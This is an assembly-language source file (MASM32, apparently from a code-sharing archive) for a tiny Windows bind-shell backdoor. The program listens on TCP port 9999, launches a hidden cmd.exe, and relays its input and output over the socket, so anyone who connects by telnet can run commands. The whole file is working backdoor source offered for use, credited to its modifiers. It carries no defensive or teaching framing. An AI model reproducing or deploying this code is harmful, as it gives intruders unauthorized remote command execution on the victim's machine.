www.pudn.com > Telnetuseage.zip > pipe.asm, change:2004-05-09,size:5249b


;Modify the file Tini2.cpp, 
;Tini2.cpp is Made by dangcefire,refdom 
; 
;Usage :telnet IP 9999 
;Tini2 Modify by dengkeng,Write by Win32Asm,Only 1.51K 
; EMail:shellc0de@sohu.com 
;If you Modify the .asm Please Send Me One :) 
 
    .486                       ; create 32 bit code 
    .model flat, stdcall       ; 32 bit memory model 
    option casemap :none       ; case sensitive 
 
    include \masm32\include\windows.inc 
    include \masm32\include\masm32.inc 
    include \masm32\include\gdi32.inc 
    include \masm32\include\user32.inc 
    include \masm32\include\kernel32.inc 
    include \masm32\include\Comctl32.inc 
    include \masm32\include\comdlg32.inc 
    include \masm32\include\shell32.inc 
    include \masm32\include\oleaut32.inc 
    include \masm32\include\wsock32.inc 
 
    includelib \masm32\lib\masm32.lib 
    includelib \masm32\lib\gdi32.lib 
    includelib \masm32\lib\user32.lib 
    includelib \masm32\lib\kernel32.lib 
    includelib \masm32\lib\Comctl32.lib 
    includelib \masm32\lib\comdlg32.lib 
    includelib \masm32\lib\shell32.lib 
    includelib \masm32\lib\oleaut32.lib 
    includelib \masm32\lib\wsock32.lib 
 
win2k	equ	1 
win9x	equ	0 
TCP_PORT	equ	9999 
 
    .const 
szErrorTitle	db	'Error',0 
szErrorMsg	db	'Init Error',0 
szErrorSockMsg	db	'Init Sock Error!',0 
szErrorBindMsg	db	'Init Bind Error!',0 
szSucc		db	'Succesfull!',0 
szSuccTitle	db	'Succ!',0 
win2kCMD	db	'\cmd.exe',0 
win98CMD	db	'\command.exe',0 
 
 
    .data? 
stWsa		WSADATA		<?> 
RemoteAddr	sockaddr_in	<?> 
startinfo	STARTUPINFO	<?> 
processinfo	PROCESS_INFORMATION	<?> 
 
;ThreadA 
pipeattrA	SECURITY_ATTRIBUTES <?> 
recv_buff	db	1024 dup(?) 
nByteToWrite	dd	? 
nByteWritten	dd	? 
 
;ThreadB 
pipeattrB	SECURITY_ATTRIBUTES <?> 
send_buff	db	25000 dup(?) 
len		dd	? 
 
 
hInstance	dd	? 
OsType		dd	? 
ServerSocket	dd	? 
ClientSocket	dd	? 
varA		dw	? 
varB		dw	? 
dwThreadIDA	DWORD	? 
dwThreadIDB	DWORD	? 
hReadPipe	HANDLE	? 
hWritePipe	HANDLE	? 
hWriteFile	HANDLE	? 
hReadFile	HANDLE	? 
szAPP		db	120	dup(?) 
 
    .code 
 
GetCMDPath	proc 
	local	SysPath[120]:byte 
	local	osvi:OSVERSIONINFO 
 
	pushad 
	invoke	GetSystemDirectory,addr SysPath,sizeof SysPath 
	invoke	lstrcpyn,addr szAPP,addr SysPath,sizeof SysPath 
	;invoke	MessageBox, NULL,addr szAPP, addr szSucc, MB_OK 
 
	mov	osvi.dwOSVersionInfoSize,sizeof OSVERSIONINFO 
	invoke	GetVersionEx,addr osvi 
	mov	edx,osvi.dwPlatformId 
	.if	edx==2 
		invoke	lstrcat,addr szAPP,addr win2kCMD 
		mov	dword ptr [OsType],win2k 
	.else 
		invoke	lstrcat,addr szAPP,addr win98CMD 
		mov	dword ptr [OsType],win9x 
	.endif 
	;invoke	MessageBox, NULL,addr szAPP, addr szSucc, MB_OK 
	popad 
	ret 
GetCMDPath	endp 
 
ThreadFuncA	proc	uses eax ,lpParam:DWORD 
	 
	mov	pipeattrA.nLength,sizeof SECURITY_ATTRIBUTES 
	mov	pipeattrA.lpSecurityDescriptor,NULL 
	mov	pipeattrA.bInheritHandle,TRUE 
	invoke	CreatePipe,addr hReadPipe,addr hWriteFile,addr pipeattrA,0 
 
	mov	word ptr [varA],1 
	 
	@@3: 
		invoke	Sleep,250 
		invoke	recv,ClientSocket,addr recv_buff,1024,0 
		mov	nByteToWrite,eax 
 
		invoke	WriteFile,hWriteFile,addr recv_buff,nByteToWrite,addr nByteWritten,NULL 
	jmp	@@3 
 
	ret 
ThreadFuncA	endp	 
 
 
ThreadFuncB	proc	uses eax ,lpParam:DWORD 
	 
	mov	pipeattrB.nLength,sizeof SECURITY_ATTRIBUTES 
	mov	pipeattrB.lpSecurityDescriptor,NULL 
	mov	pipeattrB.bInheritHandle,TRUE 
 
	invoke	CreatePipe,addr hReadFile,addr hWritePipe,addr pipeattrB,0 
 
	mov	word ptr [varB],1 
 
	@@2: 
		invoke	ReadFile,hReadFile,addr send_buff,25000,addr len,NULL 
		invoke	send,ClientSocket,addr send_buff,len,0 
	jmp	@@2 
 
	ret 
ThreadFuncB	endp 
 
 
start: 
	invoke	GetModuleHandle,NULL 
	mov	hInstance,eax 
	invoke	GetCMDPath 
	 
	invoke	WSAStartup,0002h,addr stWsa 
	.if	eax 
		invoke	MessageBox,NULL,addr szErrorMsg,addr szErrorTitle,MB_OK 
		invoke	ExitProcess,NULL 
	.endif 
 
	invoke	socket,AF_INET,SOCK_STREAM,IPPROTO_TCP 
	.if	eax!=INVALID_SOCKET 
		mov	ServerSocket,eax 
	.else 
		invoke	MessageBox,NULL,addr szErrorSockMsg,addr szErrorTitle,MB_OK 
		invoke	ExitProcess,NULL 
	.endif 
 
	mov	RemoteAddr.sin_family,AF_INET 
	invoke	htons,TCP_PORT 
	mov	RemoteAddr.sin_port,ax 
	mov	RemoteAddr.sin_addr,INADDR_ANY 
 
	invoke	bind,ServerSocket,addr RemoteAddr,sizeof sockaddr_in 
 
	.if	eax==SOCKET_ERROR 
		invoke	MessageBox,NULL,addr szErrorBindMsg,addr szErrorTitle,MB_OK 
		invoke	ExitProcess,NULL 
	.else 
		invoke	listen,ServerSocket,5 
	.endif 
 
	xor	edx,edx 
	mov	varA,dx 
	mov	varB,dx 
	 
	invoke	CreateThread,NULL,NULL,offset ThreadFuncA,NULL,0,addr dwThreadIDA 
	invoke	CreateThread,NULL,NULL,offset ThreadFuncB,NULL,NULL,addr dwThreadIDB 
@@1:	 
	invoke	Sleep,250 
	mov	dx,varA 
	cmp	dx,1 
	jnz	@@1 
	and	dx,varB 
	cmp	dx,1 
	jnz	@@1 
 
	invoke	GetStartupInfo,addr startinfo 
	mov	startinfo.dwFlags,STARTF_USESHOWWINDOW or STARTF_USESTDHANDLES 
	mov	edx,hReadPipe 
	mov	startinfo.hStdInput,edx 
	mov	edx,hWritePipe 
	mov	startinfo.hStdError,edx 
	mov	startinfo.hStdOutput,edx 
	mov	startinfo.wShowWindow,SW_HIDE 
	invoke	CreateProcess,addr szAPP,NULL, NULL, NULL, TRUE, 0,NULL, NULL, addr startinfo, addr processinfo 
	 
	@@11: 
		invoke	accept,ServerSocket,NULL,NULL 
		mov	ClientSocket,eax 
		invoke	Sleep,250 
	jmp  @@11 
 
	invoke	ExitProcess,NULL 
end start